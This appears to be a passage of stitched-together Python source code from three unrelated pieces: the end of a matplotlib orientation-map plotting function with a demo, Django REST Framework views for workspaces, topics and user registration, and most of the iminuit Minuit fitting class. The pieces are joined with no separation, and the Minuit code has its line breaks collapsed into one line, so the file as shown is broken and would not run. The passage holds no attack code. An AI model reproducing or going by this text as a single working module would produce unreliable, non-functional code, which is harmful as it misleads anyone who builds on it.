    ax.xaxis.grid(False)
    ax.yaxis.grid(False)
    ax.set_axis_off()
    ax.imshow(data, cmap=cmap)

    for i in range(orient_blocks.shape[0]):
        for j in range(orient_blocks.shape[1]):
            y0, x0 = block_shape[0] * j + block_shape[0]/2, \
                     block_shape[1] * i + block_shape[1]/2

            orientation = orient_blocks[i, j]

            x2 = x0 - math.sin(orientation) * line_length
            y2 = y0 - math.cos(orientation) * line_length

            x3 = x0 + math.sin(orientation) * line_length
            y3 = y0 + math.cos(orientation) * line_length

            ax.plot((x2, x3), (y2, y3),
                    linestyle=line_style, linewidth=line_width, color=line_color)

    if (output_dir is not None) and (name is not None):
        if not os.path.exists(output_dir):
            os.makedirs(output_dir)

        plt.tight_layout()
        fig.savefig(os.path.join(output_dir, f'{name}_fourier_orientation_map.png'),
                    bbox_inches='tight', transparent=True, pad_inches=0.05, dpi=dpi)

    plt.show()
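
# ---------------------------------------------------------------------------
# Usage sketch (added for illustration, not part of the original module): it
# calls plot_fourier_orientation on synthetic NumPy data to show the expected
# shapes -- one orientation angle (in radians) per block of the subdivided
# image. The output folder './figures' and the demo name are placeholders.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    np.random.seed(0)

    # A 256x256 test image subdivided into 32x32 pixel blocks, i.e. an 8x8
    # grid of blocks with one orientation angle each.
    image = np.random.random((256, 256))
    angles = np.random.uniform(0.0, np.pi, size=(8, 8))

    plot_fourier_orientation(image, angles, block_shape=(32, 32),
                             name='orientation_demo', output_dir='./figures')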
from django.shortcuts import render
from rest_framework import permissions, viewsets
from rest_framework.response import Response
from rest_framework.views import APIView
from django.contrib.auth.models import User
from django.contrib.auth.hashers import make_password

from . import models
from .serializer import WorkspaceSerializer, UserSerializer, TopicSerializer, LinksSerializer, NotesSerializer


class WorkspaceListViewset(viewsets.ModelViewSet):
    serializer_class = WorkspaceSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = models.Workspaces.objects.all()


class TestViewset(APIView):
    serializer_class = UserSerializer
    permission_classes = [permissions.IsAuthenticated]

    def get(self, request):
        # Simple authenticated echo endpoint used for testing.
        user = request.user
        print(user.username)
        print(user.id)
        return Response(f"user {user.username}")


class TopicsListViewset(viewsets.ModelViewSet):
    serializer_class = TopicSerializer
    permission_classes = [permissions.IsAuthenticated]
    queryset = models.Topics.objects.all()

    def list(self, request):
        # Optionally filter topics by the ?workspace=<id> query parameter;
        # without it, all topics are returned.
        wid = int(request.GET.get("workspace", '-1'))
        queryset = self.queryset
        if wid != -1:
            queryset = models.Topics.objects.filter(workspace=wid)
        serializer = TopicSerializer(queryset, many=True)
        return Response(serializer.data)


class RegisterUser(APIView):
    serializer_class = UserSerializer

    def post(self, request, format=None):
        username = request.POST["username"]
        password = request.POST["password"]
        firstname = request.POST["firstname"]
        lastname = request.POST["lastname"]
        emailid = request.POST["email"]
        user = User(username=username, password=make_password(password),
                    first_name=firstname, last_name=lastname, email=emailid)
        user.save()
        return Response(f"User {username} Created")
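
# ---------------------------------------------------------------------------
# Illustrative wiring (not part of the original app): a minimal sketch of how
# these views could be exposed through a DRF router. In a real project this
# belongs in the project's urls.py; the URL prefixes below are assumptions,
# not taken from the original code.
# ---------------------------------------------------------------------------
from django.urls import include, path
from rest_framework.routers import DefaultRouter

router = DefaultRouter()
router.register(r'workspaces', WorkspaceListViewset)
router.register(r'topics', TopicsListViewset)

urlpatterns = [
    path('api/', include(router.urls)),
    path('api/whoami/', TestViewset.as_view()),
    path('api/register/', RegisterUser.as_view()),
]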
from warnings import warn from . import util as mutil from .latex import LatexFactory from ._core import ( FCN, MnContours, MnHesse, MnMigrad, MnMinos, MnPrint, MnStrategy, MnUserParameterState, ) import numpy as np __all__ = ["Minuit"] class Minuit: LEAST_SQUARES = 1.0 """Set `:attr:errordef` to this constant for a least-squares cost function.""" LIKELIHOOD = 0.5 """Set `:attr:errordef` to this constant for a negative log-likelihood function.""" @property def fcn(self): """Cost function (usually a chi^2 or likelihood function).""" return self._fcn @property def grad(self): """Gradient function of the cost function.""" return self._fcn.grad @property def use_array_call(self): """Boolean. Whether to pass parameters as numpy array to cost function.""" return self._fcn.use_array_call @property def pos2var(self): """Map variable position to name""" return self._pos2var @property def var2pos(self): """Map variable name to position""" return self._var2pos @property def errordef(self): """FCN increment above the minimum that corresponds to one standard deviation. Default value is 1.0. `errordef` should be 1.0 for a least-squares cost function and 0.5 for negative log-likelihood function. See page 37 of http://hep.fi.infn.it/minuit.pdf. This parameter is sometimes called ``UP`` in the MINUIT docs. To make user code more readable, we provided two named constants:: from iminuit import Minuit assert Minuit.LEAST_SQUARES == 1 assert Minuit.LIKELIHOOD == 0.5 Minuit(a_least_squares_function, errordef=Minuit.LEAST_SQUARES) Minuit(a_likelihood_function, errordef=Minuit.LIKELIHOOD) """ return self._fcn.up @errordef.setter def errordef(self, value): self._fcn.up = value if self._fmin: self._fmin._src.up = value tol = 0.1 """Tolerance for convergence. The main convergence criteria of MINUIT is ``edm < edm_max``, where ``edm_max`` is calculated as ``edm_max = 0.002 * tol * errordef`` and EDM is the *estimated distance to minimum*, as described in the `MINUIT paper`_. """ _strategy = None @property def strategy(self): """Current minimization strategy. **0**: Fast. Does not check a user-provided gradient. Does not improve Hesse matrix at minimum. Extra call to :meth:`hesse` after :meth:`migrad` is always needed for good error estimates. If you pass a user-provided gradient to MINUIT, convergence is **faster**. **1**: Default. Checks user-provided gradient against numerical gradient. Checks and usually improves Hesse matrix at minimum. Extra call to :meth:`hesse` after :meth:`migrad` is usually superfluous. If you pass a user-provided gradient to MINUIT, convergence is **slower**. **2**: Careful. Like 1, but does extra checks of intermediate Hessian matrix during minimization. The effect in benchmarks is a somewhat improved accuracy at the cost of more function evaluations. A similar effect can be achieved by reducing the tolerance attr:`tol` for convergence at any strategy level. """ return self._strategy @strategy.setter def strategy(self, value): self._strategy.strategy = value @property def print_level(self): """Current print level. - 0: quiet - 1: print minimal debug messages to terminal - 2: print more debug messages to terminal - 3: print even more debug messages to terminal Note: Setting the level to 3 has a global side effect on all current instances of Minuit (this is an issue in C++ MINUIT2). 
""" return self._print_level @print_level.setter def print_level(self, level): if level < 0: level = 0 self._print_level = level if level >= 3 or level < MnPrint.global_level: warn( "Setting print_level >=3 has the side-effect of setting the level " "globally for all Minuit instances", mutil.IMinuitWarning, ) MnPrint.global_level = level @property def throw_nan(self): """Boolean. Whether to raise runtime error if function evaluate to nan.""" return self._fcn.throw_nan @throw_nan.setter def throw_nan(self, value): self._fcn.throw_nan = value @property def args(self): """Parameter values in a list-like view. See :attr:`values` for details. .. seealso:: :attr:`values`, :attr:`errors`, :attr:`fixed` """ return self._args @property def values(self): """Parameter values in a dict-like object. Use to read or write current parameter values based on the parameter index or the parameter name as a string. If you change a parameter value and run :meth:`migrad`, the minimization will start from that value, similar for :meth:`hesse` and :meth:`minos`. .. seealso:: :attr:`errors`, :attr:`fixed` """ return self._values @values.setter def values(self, args): self._values[:] = args @property def errors(self): """Parameter parabolic errors in a dict-like object. Like :attr:`values`, but instead of reading or writing the values, you read or write the errors (which double as step sizes for MINUITs numerical gradient estimation). .. seealso:: :attr:`values`, :attr:`fixed` """ return self._errors @errors.setter def errors(self, args): self._errors[:] = args @property def fixed(self): """Access fixation state of a parameter in a dict-like object. Use to read or write the fixation state of a parameter based on the parameter index or the parameter name as a string. If you change the state and run :meth:`migrad`, :meth:`hesse`, or :meth:`minos`, the new state is used. In case of complex fits, it can help to fix some parameters first and only minimize the function with respect to the other parameters, then release the fixed parameters and minimize again starting from that state. .. seealso:: :attr:`values`, :attr:`errors` """ return self._fixed @fixed.setter def fixed(self, args): self._fixed[:] = args @property def merrors(self): """Minos error objects with full status information.""" return self._merrors @property def fitarg(self): """Current Minuit state in form of a dict. * name -> value * error_name -> error * fix_name -> fix * limit_name -> (lower_limit, upper_limit) This is very useful when you want to save the fit parameters and re-use them later. For example:: m = Minuit(f, x=1) m.migrad() fitarg = m.fitarg m2 = Minuit(f, **fitarg) """ kwargs = {} for mp in self._last_state: kwargs[mp.name] = mp.value kwargs[f"error_{mp.name}"] = mp.error if mp.is_fixed: kwargs[f"fix_{mp.name}"] = mp.is_fixed has_lower = mp.has_lower_limit has_upper = mp.has_upper_limit if has_lower or has_upper: kwargs[f"limit_{mp.name}"] = ( mp.lower_limit if has_lower else -np.inf, mp.upper_limit if has_upper else np.inf, ) return kwargs @property def parameters(self): """Parameter name tuple""" return self._pos2var @property def narg(self): """Number of parameters.""" return len(self._init_state) @property def nfit(self): """Number of fitted parameters (fixed parameters not counted).""" return self.narg - sum(self.fixed.values()) @property def covariance(self): """Covariance matrix (dict (name1, name2) -> covariance). .. 
seealso:: :meth:`matrix` """ free = tuple(self._free_parameters()) cov = self._last_state.covariance if self._last_state.has_covariance: return { (v1, v2): cov[i, j] for i, v1 in enumerate(free) for j, v2 in enumerate(free) } @property def gcc(self): """Global correlation coefficients (dict : name -> gcc).""" free = self._free_parameters() if self._last_state.has_globalcc: gcc = self._last_state.globalcc if gcc: return {v: gcc[i] for i, v in enumerate(free)} _print_level = 1 _fmin = None def __init__( self, fcn, grad=None, errordef=None, print_level=0, name=None, pedantic=True, throw_nan=False, use_array_call=False, **kwds, ): """ Construct minuit object from given *fcn* **Arguments:** **fcn**, the function to be optimized, is the only required argument. Two kinds of function signatures are understood. a) Parameters passed as positional arguments The function has several positional arguments, one for each fit parameter. Example:: def func(a, b, c): ... The parameters a, b, c must accept a real number. iminuit automagically detects parameters names in this case. More information about how the function signature is detected can be found in :ref:`function-sig-label` b) Parameters passed as Numpy array The function has a single argument which is a Numpy array. Example:: def func(x): ... Pass the keyword `use_array_call=True` to use this signature. For more information, see "Parameter Keyword Arguments" further down. If you work with array parameters a lot, have a look at the static initializer method :meth:`from_array_func`, which adds some convenience and safety to this use case. **Builtin Keyword Arguments:** - **throw_nan**: set fcn to raise RuntimeError when it encounters *nan*. (Default False) - **pedantic**: warns about parameters that do not have initial value or initial error/stepsize set. - **name**: sequence of strings. If set, this is used to detect parameter names instead of iminuit's function signature detection. - **print_level**: set the print_level for this Minuit. 0 is quiet. 1 print out at the end of MIGRAD/HESSE/MINOS. 2 prints debug messages. - **errordef**: Optional. See :attr:`errordef` for details on this parameter. If set to `None` (the default), Minuit will try to call `fcn.errordef` to set the error definition. If this fails, a warning is raised and use a value appropriate for a least-squares function is used. - **grad**: Optional. Provide a function that calculates the gradient analytically and returns an iterable object with one element for each dimension. If None is given MINUIT will calculate the gradient numerically. (Default None) - **use_array_call**: Optional. Set this to true if your function signature accepts a single numpy array of the parameters. You need to also pass the `name` keyword then to explicitly name the parameters. **Parameter Keyword Arguments:** iminuit allows user to set initial value, initial stepsize/error, limits of parameters and whether the parameter should be fixed by passing keyword arguments to Minuit. This is best explained through examples:: def f(x, y): return (x-2)**2 + (y-3)**2 * Initial value (varname):: #initial value for x and y m = Minuit(f, x=1, y=2) * Initial step size (fix_varname):: #initial step size for x and y m = Minuit(f, error_x=0.5, error_y=0.5) * Limits (limit_varname=tuple):: #limits x and y m = Minuit(f, limit_x=(-10,10), limit_y=(-20,20)) * Fixing parameters:: #fix x but vary y m = Minuit(f, fix_x=True) .. 
note:: You can use dictionary expansion to programmatically change parameters.:: kwargs = dict(x=1., error_x=0.5) m = Minuit(f, **kwargs) You can also obtain fit arguments from Minuit object for later reuse. *fitarg* will be automatically updated to the minimum value and the corresponding error when you ran migrad/hesse.:: m = Minuit(f, x=1, error_x=0.5) my_fitarg = m.fitarg another_fit = Minuit(f, **my_fitarg) """ if use_array_call and name is None: raise KeyError("`use_array_call=True` requires that `name` is set") args = mutil.describe(fcn) if name is None else name # Maintain 2 dictionaries to easily convert between # parameter names and position self._pos2var = tuple(args) self._var2pos = {k: i for i, k in enumerate(args)} if pedantic: self._pedantic(args, kwds) if errordef is None: if hasattr(fcn, "errordef"): errordef = fcn.errordef else: if pedantic: warn( "errordef not set, defaults to 1", mutil.InitialParamWarning, stacklevel=2, ) errordef = 1.0 errordef = float(errordef) if errordef <= 0: raise ValueError(f"errordef={errordef} must be a positive number") self.print_level = print_level self._strategy = MnStrategy(1) self._fcn = FCN(fcn, grad, use_array_call, errordef, throw_nan) self._init_state = self._make_init_state(kwds) self._last_state = self._init_state self._args = ArgsView(self) self._values = ValueView(self) self._errors = ErrorView(self) self._fixed = FixedView(self) self._merrors = mutil.MErrors() def _make_init_state(self, kwds): pars = self.parameters # check kwds fixed_param = {"fix_" + p for p in pars} limit_param = {"limit_" + p for p in pars} error_param = {"error_" + p for p in pars} for k in kwds: if ( k not in pars and k not in fixed_param and k not in limit_param and k not in error_param ): raise RuntimeError( f"Cannot understand keyword {k}, maybe a typo? " f"Parameters are {pars}" ) state = MnUserParameterState() for i, x in enumerate(self._pos2var): lim = mutil._normalize_limit(kwds.get(f"limit_{x}", None)) val = kwds.get(x, mutil._guess_initial_value(lim)) err = kwds.get(f"error_{x}", mutil._guess_initial_step(val)) fix = kwds.get(f"fix_{x}", False) if lim is None: state.add(x, val, err) else: lb, ub = lim if lb == ub: state.add(x, lb, err) state.fix(i) elif lb == -np.inf and ub == np.inf: state.add(x, val, err) elif ub == np.inf: state.add(x, val, err) state.set_lower_limit(i, lb) elif lb == -np.inf: state.add(x, val, err) state.set_upper_limit(i, ub) else: state.add(x, val, err, lb, ub) if fix: state.fix(i) return state @classmethod def from_array_func( cls, fcn, start, error=None, limit=None, fix=None, name=None, **kwds ): """Construct Minuit object from given *fcn* and start sequence. This is an alternative named constructor for the minuit object. It is more convenient to use for functions that accept a numpy array. **Arguments:** **fcn**: The function to be optimized. Must accept a single parameter that is a numpy array. def func(x): ... **start**: Sequence of numbers. Starting point for the minimization. **Keyword arguments:** **error**: Optional sequence of numbers. Initial step sizes. Scalars are automatically broadcasted to the length of the start sequence. **limit**: Optional sequence of limits that restrict the range in which a parameter is varied by minuit. Limits can be set in several ways. 
With inf = float("infinity") we get: - No limit: None, (-inf, inf), (None, None) - Lower limit: (x, None), (x, inf) [replace x with a number] - Upper limit: (None, x), (-inf, x) [replace x with a number] A single limit is automatically broadcasted to the length of the start sequence. **fix**: Optional sequence of boolean values. Whether to fix a parameter to the starting value. **name**: Optional sequence of parameter names. If names are not specified, the parameters are called x0, ..., xN. All other keywords are forwarded to :class:`Minuit`, see its documentation. **Example:** A simple example function is passed to Minuit. It accept a numpy array of the parameters. Initial starting values and error estimates are given:: import numpy as np def f(x): mu = (2, 3) return np.sum((x-mu)**2) # error is automatically broadcasted to (0.5, 0.5) m = Minuit.from_array_func(f, (2, 3), error=0.5) """ npar = len(start) pnames = name if name is not None else [f"x{i}" for i in range(npar)] kwds["name"] = pnames kwds["use_array_call"] = True if error is not None: if np.isscalar(error): error = np.ones(npar) * error else: if len(error) != npar: raise RuntimeError( "length of error sequence does " "not match start sequence" ) if limit is not None: if len(limit) == 2 and np.isscalar(limit[0]) and np.isscalar(limit[1]): limit = [limit for i in range(npar)] else: if len(limit) != npar: raise RuntimeError( "length of limit sequence does " "not match start sequence" ) for i, name in enumerate(pnames): kwds[name] = start[i] if error is not None: kwds["error_" + name] = error[i] if limit is not None: kwds["limit_" + name] = limit[i] if fix is not None: kwds["fix_" + name] = fix[i] return cls(fcn, **kwds) def reset(self): """Reset minimization state to initial state.""" self._last_state = self._init_state self._fmin = None self._fcn.nfcn = 0 self._fcn.ngrad = 0 self._merrors = mutil.MErrors() def migrad(self, ncall=None, resume=True, precision=None, iterate=5): """Run MIGRAD. MIGRAD is a robust minimisation algorithm which earned its reputation in 40+ years of almost exclusive usage in high-energy physics. How MIGRAD works is described in the `MINUIT paper`_. **Arguments:** * **ncall**: integer or None, optional; (approximate) maximum number of call before MIGRAD will stop trying. Default: None (indicates to use MIGRAD's internal heuristic). Note: MIGRAD may slightly violate this limit, because it checks the condition only after a full iteration of the algorithm, which usually performs several function calls. * **resume**: boolean indicating whether MIGRAD should resume from the previous minimiser attempt(True) or should start from the beginning(False). Default True. * **precision**: override Minuit precision estimate for the cost function. Default: None (= use epsilon of a C++ double). If the cost function has a lower precision (e.g. of a C++ float), setting this to a lower value will accelerate convergence and reduce the rate of unsuccessful convergence. * **iterate**: automatically call Migrad up to N times if convergence was not reached. Default: 5. This simple heuristic makes Migrad converge more often even if the numerical precision of the cost function is low. Setting this to 1 disables the feature. 
**Return:** :ref:`function-minimum-sruct`, list of :ref:`minuit-param-struct` """ if ncall is None: ncall = 0 # tells C++ Minuit to use its internal heuristic if iterate < 1: raise ValueError("iterate must be at least 1") if not resume: self.reset() migrad = MnMigrad(self._fcn, self._last_state, self.strategy) migrad.set_print_level(self.print_level) if precision is not None: migrad.precision = precision nc = self._fcn.nfcn ng = self._fcn.ngrad # Automatically call Migrad up to `iterate` times if minimum is not valid. # This simple heuristic makes Migrad converge more often. for _ in range(iterate): fm = migrad(ncall, self.tol) if fm.is_valid or fm.has_reached_call_limit: break self._last_state = fm.state self._fmin = mutil.FMin( fm, self._fcn, self._fcn.nfcn - nc, self._fcn.ngrad - ng, self.tol, ) mr = mutil.MigradResult(self._fmin, self.params) if self.print_level >= 2: print(mr) return mr def hesse(self, ncall=None): """Run HESSE to compute parabolic errors. HESSE estimates the covariance matrix by inverting the matrix of `second derivatives (Hesse matrix) at the minimum <http://en.wikipedia.org/wiki/Hessian_matrix>`_. This covariance matrix is valid if your :math:`\\chi^2` or likelihood profile looks like a hyperparabola around the the minimum. This is usually the case, especially when you fit many observations (in the limit of infinite samples this is always the case). If you want to know how your parameters are correlated, you also need to use HESSE. Also see :meth:`minos`, which computes the uncertainties in a different way. **Arguments:** - **ncall**: integer or None, limit the number of calls made by MINOS. Default: None (uses an internal heuristic by C++ MINUIT). **Returns:** list of :ref:`minuit-param-struct` """ ncall = 0 if ncall is None else int(ncall) nc = self._fcn.nfcn ng = self._fcn.ngrad hesse = MnHesse(self.strategy) fm = self._fmin._src if self._fmin else None if fm and fm.state == self._last_state: # _last_state not modified, can update _fmin which is more efficient hesse(self._fcn, fm, ncall) self._last_state = fm.state else: # _fmin does not exist or _last_state was modified, # so we cannot just update last _fmin self._last_state = hesse(self._fcn, self._last_state, ncall) if fm is not None: self._fmin.nfcn = self._fcn.nfcn - nc self._fmin.ngrad = self._fcn.ngrad - ng if self._last_state.has_covariance is False: if not self._fmin: raise RuntimeError("HESSE Failed") return self.params def minos(self, var=None, sigma=1.0, ncall=None): """Run MINOS to compute asymmetric confidence intervals. MINOS uses the profile likelihood method to compute (asymmetric) confidence intervals. It scans the negative log-likelihood or (equivalently) the least-squares cost function around the minimum to construct an asymmetric confidence interval. This interval may be more reasonable when a parameter is close to one of its parameter limits. As a rule-of-thumb: when the confidence intervals computed with HESSE and MINOS differ strongly, the MINOS intervals are to be preferred. Otherwise, HESSE intervals are preferred. Running MINOS is computationally expensive when there are many fit parameters. Effectively, it scans over *var* in small steps and runs MIGRAD to minimise the FCN with respect to all other free parameters at each point. This is requires many more FCN evaluations than running HESSE. **Arguments:** - **var**: optional variable name to compute the error for. If var is not given, MINOS is run for every variable. - **sigma**: number of :math:`\\sigma` error. Default 1.0. 
- **ncall**: integer or None, limit the number of calls made by MINOS. Default: None (uses an internal heuristic by C++ MINUIT). **Returns:** Dictionary of varname to :ref:`minos-error-struct`, containing all up to now computed errors, including the current request. """ if not self._fmin: raise RuntimeError( "MINOS require function to be at the minimum." " Run MIGRAD first." ) ncall = 0 if ncall is None else int(ncall) if not self._fmin.is_valid: raise RuntimeError( ("Function minimum is not valid. Make sure " "MIGRAD converged first") ) if var is not None and var not in self._pos2var: raise RuntimeError(f"Unknown parameter {var}") nc = self._fcn.nfcn ng = self._fcn.ngrad with mutil.TemporaryUp(self._fcn, sigma): minos = MnMinos(self._fcn, self._fmin._src, self.strategy) vnames = self._pos2var if var is None else [var] for vname in vnames: if self.fixed[vname]: if var is not None and var == vname: warn( f"Cannot scan parameter {var}, it is fixed", mutil.IMinuitWarning, ) return None continue me = minos(self._var2pos[vname], ncall, self.tol) self._merrors[vname] = mutil.MError(vname, me) self._fmin.nfcn = self._fcn.nfcn - nc self._fmin.ngrad = self._fcn.ngrad - ng return self.merrors def matrix(self, correlation=False, skip_fixed=True): """Error or correlation matrix in tuple or tuples format.""" if not self._last_state.has_covariance: raise RuntimeError( "Covariance is not valid. Maybe the last Hesse call failed?" ) mncov = self._last_state.covariance # When some parameters are fixed, mncov is a sub-matrix. If skip-fixed # is false, we need to expand the sub-matrix back into the full form. # This requires a translation between sub-index und full-index. if skip_fixed: npar = sum(not mp.is_fixed for mp in self._last_state) ind = range(npar) def cov(i, j): return mncov[i, j] else: ext2int = {} iint = 0 for mp in self._last_state: if not mp.is_fixed: ext2int[mp.number] = iint iint += 1 ind = range(self.narg) def cov(i, j): if i not in ext2int or j not in ext2int: return 0.0 return mncov[ext2int[i], ext2int[j]] names = [k for (k, v) in self.fixed.items() if not (skip_fixed and v)] if correlation: def cor(i, j): return cov(i, j) / ((cov(i, i) * cov(j, j)) ** 0.5 + 1e-100) ret = mutil.Matrix(names, ((cor(i, j) for i in ind) for j in ind)) else: ret = mutil.Matrix(names, ((cov(i, j) for i in ind) for j in ind)) return ret def latex_matrix(self): """Build :class:`LatexFactory` object with correlation matrix.""" matrix = self.matrix(correlation=True, skip_fixed=True) return LatexFactory.build_matrix(matrix.names, matrix) def np_matrix(self, **kwds): """Covariance or correlation matrix in numpy array format. Keyword arguments are forwarded to :meth:`matrix`. The name of this function was chosen to be analogous to :meth:`matrix`, it returns the same information in a different format. For documentation on the arguments, please see :meth:`matrix`. **Returns:** 2D ``numpy.ndarray`` of shape (N,N) (not a ``numpy.matrix``). """ matrix = self.matrix(**kwds) return np.array(matrix, dtype=np.double) def np_values(self): """Parameter values in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,). """ return np.array(self.args, dtype=np.double) def np_errors(self): """Hesse parameter errors in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,). 
""" a = np.empty(self.narg, dtype=np.double) for i in range(self.narg): a[i] = self.errors[i] return a def np_merrors(self): """MINOS parameter errors in numpy array format. Fixed parameters are included (zeros are returned), the order follows :attr:`parameters`. The format of the produced array follows matplotlib conventions, as in ``matplotlib.pyplot.errorbar``. The shape is (2, N) for N parameters. The first row represents the downward error as a positive offset from the center. Likewise, the second row represents the upward error as a positive offset from the center. **Returns:** ``numpy.ndarray`` of shape (2, N). """ # array format follows matplotlib conventions, see pyplot.errorbar a = np.zeros((2, self.narg)) for me in self.merrors.values(): i = self._var2pos[me.name] a[0, i] = -me.lower a[1, i] = me.upper return a def np_covariance(self): """Covariance matrix in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,N) (not a ``numpy.matrix``). """ return self.np_matrix(correlation=False, skip_fixed=False) def latex_param(self): """build :class:`iminuit.latex.LatexTable` for current parameter""" return LatexFactory.build_param_table(self.params, self.merrors) def latex_initial_param(self): """Build :class:`iminuit.latex.LatexTable` for initial parameter""" return LatexFactory.build_param_table(self.init_params, {}) @property def fmin(self): """Current function minimum data object""" return self._fmin @property def fval(self): """Function minimum value. .. seealso:: :meth:`fmin` """ fm = self._fmin return fm.fval if fm else None @property def params(self): """List of current parameter data objects.""" return mutil._get_params(self._last_state, self.merrors) @property def init_params(self): """List of current parameter data objects set to the initial fit state.""" return mutil._get_params(self._init_state, None) @property def ncalls_total(self): """Total number of calls to FCN (not just the last operation).""" return self._fcn.nfcn @property def ngrads_total(self): """Total number of calls to Gradient (not just the last operation).""" return self._fcn.ngrad @property def valid(self): """Check if function minimum is valid.""" return self._fmin and self._fmin.is_valid @property def accurate(self): """Check if covariance (of the last MIGRAD run) is accurate.""" return self._fmin and self._fmin.has_accurate_covar def mnprofile(self, vname, bins=30, bound=2, subtract_min=False): """Calculate MINOS profile around the specified range. Scans over **vname** and minimises FCN over the other parameters in each point. **Arguments:** * **vname** name of variable to scan * **bins** number of scanning bins. Default 30. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default 2 * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. 
**Returns:** bins(center point), value, MIGRAD results """ if vname not in self._pos2var: raise ValueError("Unknown parameter %s" % vname) bound = self._normalize_bound(vname, bound) values = np.linspace(bound[0], bound[1], bins, dtype=np.double) results = np.empty(bins, dtype=np.double) status = np.empty(bins, dtype=np.bool) state = MnUserParameterState(self._last_state) # copy ipar = self._var2pos[vname] state.fix(ipar) pr = MnPrint("Minuit.mnprofile", self.print_level) for i, v in enumerate(values): state.set_value(ipar, v) migrad = MnMigrad(self._fcn, state, self.strategy) fm = migrad(0, self.tol) if not fm.is_valid: pr.warn(f"MIGRAD fails to converge for {vname}={v}") status[i] = fm.is_valid results[i] = fm.fval vmin = np.min(results) if subtract_min: results -= vmin return values, results, status def draw_mnprofile( self, vname, bins=30, bound=2, subtract_min=False, band=True, text=True ): """Draw MINOS profile in the specified range. It is obtained by finding MIGRAD results with **vname** fixed at various places within **bound**. **Arguments:** * **vname** variable name to scan * **bins** number of scanning bin. Default 30. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default 2. * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. * **band** show green band to indicate the increase of fcn by *errordef*. Default True. * **text** show text for the location where the fcn is increased by *errordef*. This is less accurate than :meth:`minos`. Default True. **Returns:** bins(center point), value, migrad results .. plot:: plots/mnprofile.py :include-source: """ x, y, s = self.mnprofile(vname, bins, bound, subtract_min) return self._draw_profile(vname, x, y, band, text) def profile(self, vname, bins=100, bound=2, subtract_min=False): """Calculate cost function profile around specify range. **Arguments:** * **vname** variable name to scan * **bins** number of scanning bin. Default 100. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default: 2. * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. **Returns:** bins(center point), value .. seealso:: :meth:`mnprofile` """ if subtract_min and not self._fmin: raise RuntimeError( "Request for minimization " "subtraction but no minimization has been done. " "Run MIGRAD first." ) bound = self._normalize_bound(vname, bound) ipar = self._var2pos[vname] scan = np.linspace(bound[0], bound[1], bins, dtype=np.double) result = np.empty(bins, dtype=np.double) values = self.np_values() for i, vi in enumerate(scan): values[ipar] = vi result[i] = self.fcn(values) if subtract_min: result -= self.fval return scan, result def draw_profile( self, vname, bins=100, bound=2, subtract_min=False, band=True, text=True, ): """A convenient wrapper for drawing profile using matplotlib. A 1D scan of the cost function around the minimum, useful to inspect the minimum and the FCN around the minimum for defects. For a fit with several free parameters this is not the same as the MINOS profile computed by :meth:`draw_mncontour`. Use :meth:`mnprofile` or :meth:`draw_mnprofile` to compute confidence intervals. 
If a function minimum was found in a previous MIGRAD call, a vertical line indicates the parameter value. An optional band indicates the uncertainty interval of the parameter computed by HESSE or MINOS. **Arguments:** In addition to argument listed on :meth:`profile`. draw_profile take these addition argument: * **band** show green band to indicate the increase of fcn by *errordef*. Note again that this is NOT minos error in general. Default True. * **text** show text for the location where the fcn is increased by *errordef*. This is less accurate than :meth:`minos` Note again that this is NOT minos error in general. Default True. .. seealso:: :meth:`mnprofile` :meth:`draw_mnprofile` :meth:`profile` """ x, y = self.profile(vname, bins, bound, subtract_min) return self._draw_profile(vname, x, y, band, text) def _draw_profile(self, vname, x, y, band, text): from matplotlib import pyplot as plt plt.plot(x, y) plt.xlabel(vname) plt.ylabel("FCN") v = self.values[vname] plt.axvline(v, color="k", linestyle="--") vmin = None vmax = None if (vname, 1) in self.merrors: vmin = v + self.merrors[(vname, -1)] vmax = v + self.merrors[(vname, 1)] if vname in self.errors: vmin = v - self.errors[vname] vmax = v + self.errors[vname] if vmin is not None and band: plt.axvspan(vmin, vmax, facecolor="0.8") if text: plt.title( ("%s = %.3g" % (vname, v)) if vmin is None else ("%s = %.3g - %.3g + %.3g" % (vname, v, v - vmin, vmax - v)), fontsize="large", ) return x, y def contour(self, x, y, bins=50, bound=2, subtract_min=False): """2D contour scan. Return the contour of a function scan over **x** and **y**, while keeping all other parameters fixed. The related :meth:`mncontour` works differently: for new pair of **x** and **y** in the scan, it minimises the function with the respect to the other parameters. This method is useful to inspect the function near the minimum to detect issues (the contours should look smooth). Use :meth:`mncontour` to create confidence regions for the parameters. If the fit has only two free parameters, you can use this instead of :meth:`mncontour`. **Arguments:** - **x** variable name for X axis of scan - **y** variable name for Y axis of scan - **bound** If bound is 2x2 array, [[v1min,v1max],[v2min,v2max]]. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound*:math:`\\sigma`). Default: 2. - **subtract_min** Subtract minimum off from return values. Default False. **Returns:** x_bins, y_bins, values values[y, x] <-- this choice is so that you can pass it to through matplotlib contour() .. seealso:: :meth:`mncontour` :meth:`mnprofile` """ if subtract_min and not self._fmin: raise RuntimeError( "Request for minimization " "subtraction but no minimization has been done. " "Run MIGRAD first." 
